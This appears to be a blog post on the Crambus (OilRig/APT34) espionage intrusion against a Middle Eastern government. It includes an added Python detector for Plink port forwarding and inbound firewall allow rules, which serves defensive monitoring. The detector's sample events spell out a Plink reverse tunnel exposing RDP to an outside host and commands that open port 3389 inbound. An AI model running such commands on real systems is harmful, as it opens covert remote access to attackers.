The Iranian espionage group known as Crambus (also tracked as OilRig and APT34; MuddyWater is a separate Iranian group) conducted an eight-month intrusion against the network of a Middle Eastern government, from February to September 2023. The attackers stole files and passwords and planted a PowerShell backdoor called PowerExchange, which let them monitor incoming mail on an Exchange Server and execute commands delivered to it by email.

They also deployed backdoors and keyloggers on several computers. To keep remote access, the attackers used Plink, the command-line SSH client from the PuTTY suite, to set up port-forwarding rules on a compromised machine, and modified Windows firewall rules so that the inbound connections would be allowed. Crambus has a history of targeting Saudi Arabia, Israel, the United Arab Emirates, Iraq, Jordan, Lebanon, Kuwait, Qatar, Albania, the US and Turkey. The group is known for long-running intelligence-gathering operations and has in recent years added social engineering to its attacks.
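The remote-access setup described above (Plink port forwarding plus a firewall rule opening the forwarded service, typically RDP) leaves a recognisable trail in process-creation telemetry. The script below is an added detection example written for this page; it is not code from the article or from Symantec's report. It assumes Sysmon Event ID 1-style records with `host`, `image` and `cmdline` fields, and the sample events are constructed, not real telemetry.

```python
"""Flag Plink port forwarding and inbound firewall 'allow' rules in process-creation events.

Added example (not from the page or from Symantec). Field names host/image/cmdline
mirror Sysmon Event ID 1 and are an assumption; SAMPLE_EVENTS are constructed.
"""
import re

RDP_PORTS = {"3389"}

# Plink forwarding switches: "-R [listen:]port:host:port", "-L likewise", "-D port".
# Matches both "-R spec" and "-Rspec". Plink switches are case-sensitive, so the
# command line is scanned as-is rather than lower-cased.
PLINK_FWD_RE = re.compile(r"(?<!\S)-(?P<flag>[RLD])\s*(?P<spec>[\w.:]+)")
NETSH_ADD_RE = re.compile(r"netsh\s+advfirewall\s+firewall\s+add\s+rule", re.I)

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "srv01", "image": r"C:\Windows\Temp\plink.exe",
     "cmdline": "plink.exe -N -R 0.0.0.0:2222:127.0.0.1:3389 -pw Passw0rd tunnel@203.0.113.10"},
    {"host": "srv01", "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": 'netsh advfirewall firewall add rule name="Remote Desktop" dir=in action=allow protocol=TCP localport=3389'},
    {"host": "ws07", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c New-NetFirewallRule -DisplayName RDP -Direction Inbound -Protocol TCP -LocalPort 3389 -Action Allow"},
    {"host": "ws07", "image": r"C:\Users\Public\plink.exe",
     "cmdline": "plink.exe -L 8080:10.0.0.9:80 -pw Passw0rd user@10.0.0.9"},
    {"host": "ws03", "image": r"C:\Program Files\PuTTY\plink.exe",
     "cmdline": "plink.exe -ssh admin@10.0.0.5"},          # interactive SSH, no forwarding
    {"host": "ws03", "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh interface ip show config"},          # unrelated netsh use
]


def parse_firewall_rule(cmd):
    """Extract port/direction/action from a netsh or New-NetFirewallRule 'add rule' command.

    Returns None when the command does not add a firewall rule. Both tools accept any
    casing, so matching is done on the lower-cased command line.
    """
    low = cmd.lower()
    if NETSH_ADD_RE.search(low):
        # netsh uses key=value pairs; quoted values (name="...") are kept whole.
        kv = dict(re.findall(r'(\w+)=("[^"]*"|\S+)', low))
        return {"port": kv.get("localport"), "direction": kv.get("dir"), "action": kv.get("action")}
    if "new-netfirewallrule" in low:
        # PowerShell uses -Parameter value pairs.
        kv = dict(re.findall(r"(?<!\w)-(\w+)\s+(\S+)", low))
        return {"port": kv.get("localport"), "direction": kv.get("direction"), "action": kv.get("action")}
    return None


def analyze_event(ev):
    """Return a list of finding dicts for one process-creation event (empty if clean)."""
    findings = []
    cmd = ev["cmdline"]

    # Matching on the image name is the simplest check; a renamed plink.exe would
    # need a hash/imphash match or a PuTTY-specific switch pattern (-pw, -hostkey).
    if ev["image"].lower().endswith("plink.exe"):
        for m in PLINK_FWD_RE.finditer(cmd):
            flag, spec = m.group("flag"), m.group("spec")
            dest_port = spec.rsplit(":", 1)[-1]
            # A reverse (-R) tunnel exposes an internal service to the SSH server the
            # attacker controls; anything that reaches RDP is rated high as well.
            findings.append({
                "host": ev["host"],
                "technique": "plink_port_forward",
                "severity": "high" if flag == "R" or dest_port in RDP_PORTS else "medium",
                "detail": f"-{flag} {spec}",
            })

    rule = parse_firewall_rule(cmd)
    if rule and rule["direction"] in ("in", "inbound") and rule["action"] == "allow":
        findings.append({
            "host": ev["host"],
            "technique": "firewall_inbound_allow",
            "severity": "high" if rule["port"] in RDP_PORTS else "medium",
            "detail": f"port {rule['port']}",
        })
    return findings


def scan(events):
    """Run analyze_event over a sequence of events and flatten the findings."""
    return [f for ev in events for f in analyze_event(ev)]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['severity']:6} {f['host']:6} {f['technique']:24} {f['detail']}")
```

Against the constructed events this yields four findings: the reverse tunnel to 3389, the two inbound RDP allow rules (netsh and New-NetFirewallRule) and, at medium severity, the local forward to an internal web port; the interactive SSH session and the unrelated netsh call are left alone. In production the same two checks map naturally onto Sysmon Event ID 1 plus Windows event 4946 (firewall rule added) and 4947 (rule modified), which catch firewall changes made through the GUI or API rather than the command line.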

During this intrusion, Crambus deployed three previously unseen pieces of malware alongside publicly available tooling: the credential-dumping tool Mimikatz and the Plink SSH client. The activity was first detected in February 2023 and continued through September, spreading to multiple computers and servers.

About the Author

Fabio, Full Stack Developer

I’m passionate about web development and design in all its forms, helping small businesses build and improve their online presence. I spend a lot of time learning new techniques and actively helping other people learn web development through a variety of help groups and writing tutorials for my blog about advancements in web design and development.
